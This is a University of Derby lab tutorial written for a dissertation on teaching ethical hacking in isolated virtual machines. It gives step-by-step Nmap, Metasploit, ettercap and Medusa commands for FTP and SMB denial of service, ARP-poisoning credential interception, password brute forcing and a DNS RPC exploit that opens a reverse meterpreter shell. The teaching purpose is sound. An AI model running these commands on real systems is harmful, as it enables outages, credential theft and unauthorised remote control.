UNIVERSITY OF DERBY

1 | P a g e

Hacking in Action – Tutorial

Background

Firstly, thank you for agreeing to participate in this tutorial. The results of this, as well

as the survey which you will be asked to complete following this session, will contribute

to a dissertation investigating the feasibility of using virtual environments to teach

ethical hacking in educational institutions.

Hacking is a very delicate subject when studying IT security; however it is suggested

that the best defensive measures can be ensured by learning how to infiltrate and

disrupt services,. Therefore this tutorial, although highly simplified, will put you in the

seat of an ethical attacker who is employed to test the defensive measures in place on a

corporate network. The purpose of this is to provide a conceptual understanding of both

the mentality, and techniques used by an ethical hacker.

The tutorial will begin by initiating four virtual machines found on the local computer.

You will be using a well-recognized suite of tools used by professional security

consultants which have been collated to form a Linux distribution known as BackTrack.

Once all of the virtual machines have fully loaded, and you have logged into Back Track,

you will use a tool known as Nmap to conduct reconnaissance on the local network in

order to determine the IP (Internet Protocol) addresses of hosts connected to the local

subnet. Nmap will also be used to discover the Operating System (OS) used by each

host, and their respective services (indicated by banners and port numbers). Once the

local network is mapped, and sufficient knowledge of each host is ascertained, you will

move on to use the Metasploit Framework to conduct four attacks. These attacks will

involve:

Remotely executing a Denial of Service (DoS) attack on a File Transfer Protocol

(FTP) server.

Exploiting an out of bounds function table dereference in Server Message Block

(SMB) requests causing a Blue Screen of Death (BSoD).

Poisoning Address Resolution Protocol (ARP) requests in order to intercept

Secure Sockets Layer (SSL) traffic and obtain a user’s credentials – better known

as a Man-in-the-Middle (MITM) attack.

UNIVERSITY OF DERBY

2 | P a g e

Using a brute force tool to discover the password of an administrator account

and then obtaining root access to that server by exploiting a stack buffer

overflow in the Remote Procedure Call (RPC) interface of the Microsoft Domain

Name System (DNS) service. The root access will then be used to launch a Virtual

Network Computing (VNC) session.

This tutorial is designed to be enjoyable, but also educational, and you are reminded

that it is a criminal offence to repeat these attacks without written authorisation from

the organization, and individuals involved. Finally, due to the nature of this study,

although the virtual machines are completely isolated and are unable to communicate

with the University network or public network, there is monitoring software in use to

ensure that any attempts to breach these security measures are logged.

UNIVERSITY OF DERBY

3 | P a g e

Prelude

To begin, please open the team of virtual machines in VMware Workstation:

1. Click the start “Windows” button.

2. Then go to ‘Computer’ and open the root drive (C :\). Locate and open the

‘StudentVMs’ folder, followed by ‘STUART BUTCHER’ and finally, ‘Hacking_Final’

3. The ‘Hacking_Final’ folder contains all of the virtual machines needed for this

tutorial. Begin the tutorial by opening

double clicking the ‘Hacking_Final.vmtm’

file.

4. You will be greeted with ‘VMware Workstation’ application displaying the

‘Hacking_Final’ team tab. This contains all of the virtual machines.

UNIVERSITY OF DERBY

4 | P a g e

5. With the team open, click ‘Power on this team’ in the ‘Commands’ box. This will start

the boot up process.

The servers will start up in a particular order and take approximately 5

minutes before they are ready for use.

6. The virtual machines are ready for use when they display the ‘Press Ctrl-Alt-Delete

to logon’ screen.

To change between virtual machines, select them in the management panel

above the console. Please be aware, if you are actively using the virtual

machine, i.e. controlling its mouse, you will need to press ‘CTRL + ALT’ to

return to the host.

UNIVERSITY OF DERBY

5 | P a g e

Reconnaissance

The first task is to determine what else is on the local network and what each active

host is responsible for. To do this, we will be using a tool known as Nmap included with

BackTrack.

1. In the VMware Workstation window, take control of the ‘ATTACKER’ virtual

machine by selecting it from the

management panel above the

console.

2. Click the mouse anywhere on the virtual machine console window to take

control of it. You will see a prompt ‘bt login:’ at the bottom of the window. Type

the username ‘attacker’ and press return. You will be asked for the password,

which is ‘attacker’.

You will not be able to see the password input. If you enter it incorrectly,

you will need to repeat the process.

3. Following successful log on, the

graphical user interface will

populate and a shell window will

automatically appear.

UNIVERSITY OF DERBY

6 | P a g e

4. If a shell window does not automatically appear, click the ‘Konsole’ application

icon on the bottom menu bar.

5. Before it is possible to discover other devices on the local subnet, the attacker

needs to know what subnet they belong to. To do this, type ‘ifconfig eth0’ into the

shell window. Press

return.

6. Take a note of the IP address and subnet mask.

7. The local IP address is set to 172.172.1.10 with a subnet mask of 255.255.255.0.

This means that the network address must be 172.172.1.0. Therefore to discover

other devices within the subnet, type ‘sudo nmap –sP 172.172.1.0/24’ into the

shell window. The ‘sudo’ command runs the command with administrative

privileges and you may therefore be prompted for a password. If this happens,

type ‘attacker’. Please note, all commands are case sensitive.

UNIVERSITY OF DERBY

7 | P a g e

8. Nmap has revealed that there are three other clients on the local subnet (one of

the hosts identified is BackTrack itself).

a. 172.172.1.20

b. 172.172.1.100

c. 172.172.1.101

9. With the IP addressing information ascertained, it is now possible to acquire

brief details of what services each host is responsible for. To do this, type ‘sudo

nmap –v –O {Target IP}’

10. From the targeted scan, Nmap reveals the Operating System, network interface

card MAC address, and open ports. The ports highlight the services running on

the target. Repeat the scan for the remaining hosts.

Open Ports

Services used by ports

Network Interface Card MAC

Operating System

Information

UNIVERSITY OF DERBY

8 | P a g e

11. Although there is now a basic understanding of what ports and services are in

use, it is possible to obtain more detailed information by interrogating services.

For example, virtual machine with IP address 172.172.1.101 indicates it is

running Internet Information Services (IIS) to power its web server, but it does

not advertise which version. To discover the version of IIS, type ‘sudo nmap –A –

T4 –F 172.172.1.101’. Repeat the scan on the remaining hosts.

With some FTP servers, it is possible to gain specific system information by

connecting to the server using Telnet and typing ‘SYST’.

UNIVERSITY OF DERBY

9 | P a g e

Attacks

With the knowledge now known about the other hosts on the local subnet, it is possible

to find vulnerabilities on each. Discovered vulnerabilities are publicised on the ‘National

Vulnerability Database’ in an attempt to help administrators protect their systems and

vendors to update their software. Information gathered about each host, and the

potential vulnerabilities available to be exploited are shown below.

172.172.1.20 – VICT-CLI01

This host is using Windows XP SP2 or SP3, which may make it vulnerable to relative

path stack corruption on the Server

service, which could result in

obtaining root access, as described in CVE-2008-4250.

172.172.1.100 – VICT-SRV01

172.172.1.100 appears to be responsible for DNS, Active Directory, web service, and e-

mail. It is also using the Windows Server 2003 Operating System. Therefore, this host

may be vulnerable to an exploit of the RPC interface of the DNS service (CVE-2007-

1748). Additionally, as this host also appears to be responsible for email services, it

could be possible to conduct a Man-In-The-Middle attack on the secure HTTP traffic

when a user logs in to their

mailbox.

UNIVERSITY OF DERBY

10 | P a g e

172.172.1.101 – VICT-SRV-WEB1

This virtual machine appears to have two interesting services; FTP and HTTP. This

suggests that the server is hosting one, or more, webpages as well as providing a

download/upload service of files. Additionally, it is clear that the server is using a

Server 2008 based Operating System.

As this host is using IIS 7.0, it is likely that the FTP server is using version 7.5. Therefore,

it may be vulnerable to a Denial of Service attack as a result of a heap overflow. Further

to this, Nmap has indicated that it is using SMB v2, which is known to be vulnerable to

an array index error when an ampersand character is inputted into the Process ID field.

This triggers an attempted dereference of an out of bounds memory location, and

consequently results in a Blue Screen of Death (CVE-2009-3103).

UNIVERSITY OF DERBY

11 | P a g e

IIS FTP 7.5 DoS

It is possible to terminate the FTP service on a Windows server if they are running

version 7.5. The vulnerability occurs when the FTP server attempts to encode a portion

of overwritten FTP response when a string of 0xFF has been supplied; even past the end

of the heap buffer, resulting in heap buffer overrun. This can be demonstrated in the

Metasploit Framework.

1. Change control of the virtual machines to ‘VICT-SRV-

WEB1’. If control is currently focused on a different

virtual machine, then press ‘CTRL+ALT’. This will

return control to the host computer.

2. Login by hitting ‘CTRL+ALT+INSERT’ and typing

‘H4ckM3!’ as the password.

3. Once logged in, click the ‘Start’ button

and type ‘services.msc’ into the search

bar, followed by hitting the return key.

4. A window containing all system services will be populated. Scroll through the list

of services to find ‘Microsoft FTP Service’. It will show the service as ‘Started’.

5. Change control back to the ‘ATTACKER’ virtual machine and open a shell

window.

UNIVERSITY OF DERBY

12 | P a g e

6. Verify that it is possible to connect to the FTP server by typing ‘ftp 172.172.1.101’.

If the FTP server is running and accepting new connections then it will display

the welcome banner (‘220 Microsoft

FTP Service’) and will prompt for a

login name.

7. Hit return twice and then type ‘quit’.

8. Type ‘sudo msfconsole’. If prompted for a password, enter ‘attacker’. It may take a

short while to load.

9. Select the exploit to be used by typing

‘use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof’’ followed by hitting the return

key.

10. Next, select the target by typing ‘set RHOST 172.172.1.101’.

11. Launch the attack by typing ‘run’.

UNIVERSITY OF DERBY

13 | P a g e

12. The attack will be launched. A completion message will be returned following the

execution.

13. Change back to ‘VICT-SRV-WEB1’ and refresh the ‘Services’ window. Do not

close the shell window on BackTrack.

14. Find ‘Microsoft FTP Service’ and notice that it is no longer ‘Started’.

The FTP service is no longer running. The attack has been successful.

Server Message Block (SMB) Blue Screen of Death (BSoD)

The reconnaissance also identified that ‘VICT-SRV-WEB1’ uses SMBv2, which has a

known vulnerability. This vulnerability allows an attacker to execute code with system-

level privileges. Failed exploit attempts result in Denial of Service conditions. This

exploit involves purposely failing to execute code with system-level privileges.

1. On BackTrack, from the shell window used previously, type ‘use

auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh’.

If you closed the shell window, open a new window and type ‘sudo

msfconsole’ to start Metasploit again.

2. Set the target by entering ‘set RHOST {Target IP}’.

3. Execute the attack by typing ‘run’.

4. When the attack completes, change to the ‘VICT-SRV-WEB1’ virtual machine.

UNIVERSITY OF DERBY

14 | P a g e

5. The virtual machine should be displaying a Blue Screen of Death. It is possible to

see that the attack dereferenced of an out of bounds memory location by

examining the

error.

6. Return to the ‘ATTACKER’ and type ‘exit’.

The victim will automatically reboot. The attack has been successful.

UNIVERSITY OF DERBY

15 | P a g e

Secure Sockets Layer (SSL) Man-in-the-Middle Attack

Nmap revealed that there is an XP machine on the network. This is most likely a user’s

computer. Nmap also identified 172.172.1.100 as the mail server. Therefore, it is

possible to sniff traffic and poison ARP packets in order to intercept SSL data by acting

as a middle-man.

1. Change control to ‘VICT-CLI01’

and press ‘CTRL+ALT+INSERT’.

Enter ‘thevictim’ as the username

and ‘Password01’ as the

password.

2. Click the ‘Start’ button and open ‘Internet Explorer’.

3. When the page begins to load, a security alert window will appear. Click ‘View

Certificate’.

UNIVERSITY OF DERBY

16 | P a g e

4. The certificate will display three tabs, ‘General’, ‘Details’, and ‘Certification Path’.

Open the ‘Details’ tab.

5. The details tab contains all of the information relating to the site certificate.

Take a note of the ‘Issuer’ and information within the text box below.

6. Click ‘OK’ and then click ‘Yes’ on the security alert window.

UNIVERSITY OF DERBY

17 | P a g e

7. Enter the username ‘thevictim’ and password ‘Password01’. Then click ‘Log On’.

8. The user’s inbox will now be displayed. Click ‘Log Off’ and then close the

window.

UNIVERSITY OF DERBY

18 | P a g e

10. Change control to the ‘ATTACKER’ and from within a shell window type ‘sudo

ettercap –Tq –i eth0 –M arp:remote,oneway /172.172.1.20/ /172.172.1.100/ ’. If

prompted, enter the password ‘attacker’.

11. ARP requests are now being poisoned. Change back to ‘VICT-CLI01’. If the virtual

machine is locked, and press ‘CTRL+ALT+INSERT’ and type ‘thevictim’ for the

username and ‘Password01’ for the password.

12. Click the ‘Start’ button and open

‘Internet Explorer’. When the

security alert window displays,

click ‘View Certificate’.

13. Click the ‘Details’ tab and take a

note of the ‘Issuer’.

14. The difference in issuer

demonstrates that SSL traffic is

being intercepted.

15. Click ‘OK’ and then ‘Yes’ to

continue loading the web page.

UNIVERSITY OF DERBY

19 | P a g e

16. Enter the username ‘thevictim’ and password ‘Password01’ on the login page and

then click ‘Log On’ to load the user’s inbox.

17. Once successfully logged in, change control back to ‘ATTACKER’ and notice the

user details are printed to the display of the shell window.

18. In the shell window, type ‘q’ and the sniffing and

poisoning will terminate.

19. Return to ‘VICT-CLI01’ and click ‘Log off’. If the

virtual machine is locked, enter ‘thevictim’ as the

username and ‘Password01’ as the password.

20. Shut down the ‘VICT-CLI01’ virtual machine by clicking the ‘Start’ button and

then ‘Shut down’. Click ‘OK’ on

the next window.

That concludes the Man-in-the-Middle attack.

UNIVERSITY OF DERBY

20 | P a g e

Domain Name System (DNS) Remote Procedure Call (RPC) Service Transmission

Control Protocol (TCP) Overflow

Nmap identified that server with IP address 172.172.1.100 is not only an e-mail server,

but also responsible for the DNS and Active Directory. Unfortunately, Nmap also

highlighted that the system is relatively unpatched and a known vulnerability to that

particular OS (and service pack) involves causing a buffer overflow in the RPC interface

of the DNS service. This is triggered when a long zone name parameter is supplied that

contains escaped octal strings in a TCP packet. This will allow root access. However, in

order to take control of the servers graphical user interface, the administrator

credentials must be known. For this part, it is assumed that the administrator username

is ‘Administrator’

1. On the ‘ATTACKER’ machine, minimise the shell window if

there is one open.

2. On the desktop, there is a file titled

‘passwords’. Click on it to open it. When

prompted, click ‘Open Session’.

3. A text file containing a list of passwords

will be displayed.

4. Close this window by clicking the ‘X’ at the top right of the window.

5. Restore the shell window, or open a new one if there was not one already open.

UNIVERSITY OF DERBY

21 | P a g e

6. Start the brute forcing tool known as Medusa by typing ‘medusa –h 172.172.1.100

–u Administrator –P ‘/home/attacker/passwords’ –f –F –M smbnt’ followed by the

return key.

7. Medusa will run through all of passwords in the password text file checking to

see if there is a match. When it finds the correct one, it will display ‘SUCCESS’.

8. Take a note of the password and run Metasploit by typing ‘sudo msfconsole’. If

prompted for the password, type

‘attacker’.

9. When Metasploit has loaded, type

‘use exploit/windows/dcerpc/ms07_029_msdns_zonename’ and hit return.

10. Select the payload type to be used by typing ‘set PAYLOAD

windows/meterpreter/reverse_tcp’ followed by the return key.

11. Define the source address to be used in the reverse Transmission Control

Protocol (TCP) by typing ‘set LHOST 172.172.1.10’.

12. Enter the target

address by typing ‘set

RHOST

172.172.1.100’.

13. Type ‘exploit’ to execute the attack.

UNIVERSITY OF DERBY

22 | P a g e

14. If the attack is successful, a session with the server will be established.

15. To view the screen of the server type ‘run getgui –e’.

16. Open a new shell window. When the prompt displays, type ‘rdesktop –u

Adminsitrator –p H4ckM3! 172.172.1.100’ and press return.

17. Once logged in, click ‘Start’ followed by ‘Shut Down’.

UNIVERSITY OF DERBY

23 | P a g e

18. It is not possible to shut the server down

unless a comment is given. In the comment

box, press space and then click ‘OK’.

19. The server will warn that other users will

be disconnected. Click ‘Yes’ to continue.

20. The server will now begin the

shutdown process. Confirm this

by changing control to the ‘VICT-

SRV01’ virtual machine.

When the server shuts down, this attack is completed. In a production environment,

the loss of the e-mail server and domain controller would result in major disruption

to a business.

Cleaning Up

To complete the tutorial, shut down the remaining virtual machines:

1. Take control of ‘VICT-SRV-WEB1’ and pressing ‘CTRL+ALT+INSERT’ to log in.

Use the username ‘Administrator’ and password ‘H4ckM3!’

2. If asked for a reason why the server

unexpectedly shut down, hit the spacebar in

the comments box followed by ‘OK’.

3. Once logged in, click the ‘Start’ button

followed by the right arrow button next to

the padlock icon.

4. When ‘Shut Down’ becomes visible, click it.

UNIVERSITY OF DERBY

24 | P a g e

5. If asked for a reason for shut down, press the spacebar in the comments box and

click ‘OK’.

6. The server will begin the shutdown sequence. Change control to the ‘ATTACKER’

virtual machine.

7. Close any shell windows that may be open, and click the far left icon on menu

bar.

8. When the panel displays, click ‘Log Out’. Another window will

appear. Click ‘Log Out’ on this new window.

9. Once the graphical user interface has closed, click anywhere in

the console window to ensure it is taking keyboard input. Type

‘sudo poweroff’.When prompted, enter the password ‘attacker’.

10. The system will now begin shutting down. When all virtual machines have shut

down, the ‘Hacking_Final’ home tab will be displayed in ‘VMware Workstation’.

Thank you for taking part in this investigation. Please complete the online

survey. The password for the survey is ‘Attacker’.